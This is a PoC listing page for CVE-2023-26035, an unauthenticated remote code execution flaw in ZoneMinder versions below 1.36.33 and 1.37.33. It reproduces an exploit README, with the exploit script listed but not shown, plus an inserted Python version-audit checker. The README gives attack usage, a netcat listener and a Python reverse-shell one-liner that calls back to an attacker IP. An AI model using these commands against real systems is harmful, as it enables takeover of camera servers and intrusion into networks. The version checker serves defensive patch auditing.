
CVE-2023-26035 PoC: ZoneMinder security vulnerability

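Related vulnerability
Title: ZoneMinder security vulnerability (CVE-2023-26035)
Description: ZoneMinder is an open-source video surveillance software system. It supports IP, USB, and analog cameras. ZoneMinder versions before 1.36.33 and before 1.37.33 contain a security vulnerability: missing authorization allows unauthenticated remote code execution.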
Description
Exploit for CVE-2023-26035 affecting ZoneMinder < 1.36.33 and < 1.37.33
Introduction
# Exploit - ZoneMinder CVE-2023-26035

There is an **unauthenticated remote code execution (RCE)** vulnerability affecting **ZoneMinder** Snapshots.  
This is an **exploit** for CVE-2023-26035.

## Affected versions

ZoneMinder **< 1.36.33** and  
ZoneMinder **< 1.37.33**.
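
A defender-side check for the two version ranges above, added here as an example (it is not part of the original README or of `zoneminder.py`). It shows why the fixed release has to be looked up per branch rather than compared against a single version. The function names and the sample inventory are constructed for illustration, and releases older than 1.36 are treated as affected on the assumption that they fall under "< 1.36.33".

```python
import re

# Fixed releases named on this page, keyed by (major, minor) branch.
FIXED_PATCH = {(1, 36): 33, (1, 37): 33}


def parse_version(text):
    """Extract (major, minor, patch) from strings such as '1.36.32' or 'v1.37.10-1'."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not match:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(version_text):
    """True if the version falls in either affected range for CVE-2023-26035."""
    major, minor, patch = parse_version(version_text)
    branch = (major, minor)
    if branch in FIXED_PATCH:
        # Compare inside the branch: 1.37.10 is numerically above 1.36.33
        # but is still below its own branch's fixed release, 1.37.33.
        return patch < FIXED_PATCH[branch]
    # Assumption: branches before 1.36 are covered by "< 1.36.33";
    # branches after 1.37 are above both fixed releases.
    return branch < (1, 36)


def audit(inventory):
    """Sort hosts into affected / patched / unparsed by reported version."""
    report = {"affected": [], "patched": [], "unparsed": []}
    for host, version in sorted(inventory.items()):
        try:
            key = "affected" if is_affected(version) else "patched"
        except ValueError:
            key = "unparsed"
        report[key].append(host)
    return report


# Constructed sample inventory: hostname -> ZoneMinder version string.
INVENTORY = {
    "cam-gw-01": "1.36.32",
    "cam-gw-02": "1.36.33",
    "lab-nvr": "v1.37.10-1",
    "dvr-old": "1.34.26",
    "nvr-new": "1.37.33",
    "unknown": "not installed",
}

if __name__ == "__main__":
    print(audit(INVENTORY))
```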

![Usage of the exploit](./demo.png)

## Usage

#### Check if the target is vulnerable:

    python3 zoneminder.py http://target

#### Execute a command

    python3 zoneminder.py http://target command


## Examples

#### Test command execution with `ping`

Run `tcpdump` on the interface connected to the target (here `tun0`) and filter for `ICMP` packets:

    sudo tcpdump -i tun0 icmp

Then execute a ping to your IP. Make sure to use quotes `"` as otherwise the command won't be interpreted correctly.

    python3 zoneminder.py http://target "ping -c 4 your_ip"

#### Reverse shell

Create the listener with netcat:

    nc -lvnp 1337

Use a reverse shell oneliner:

    python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

More at https://revshells.com.

## Requirements

The exploit makes use of **`requests`** and **`BeautifulSoup`**.
Install them with:

    python3 -m pip install requests beautifulsoup4

## Acknowledgements

I just wanted a standalone exploit that didn't require Metasploit.  
The script is derived from https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
File snapshot

    [4.0K] /data/pocs/c4789e4428047af177d42aebddd1196f627873b3
    ├── [ 77K] demo.png
    ├── [1.6K] README.md
    └── [3.3K] zoneminder.py

    0 directories, 3 files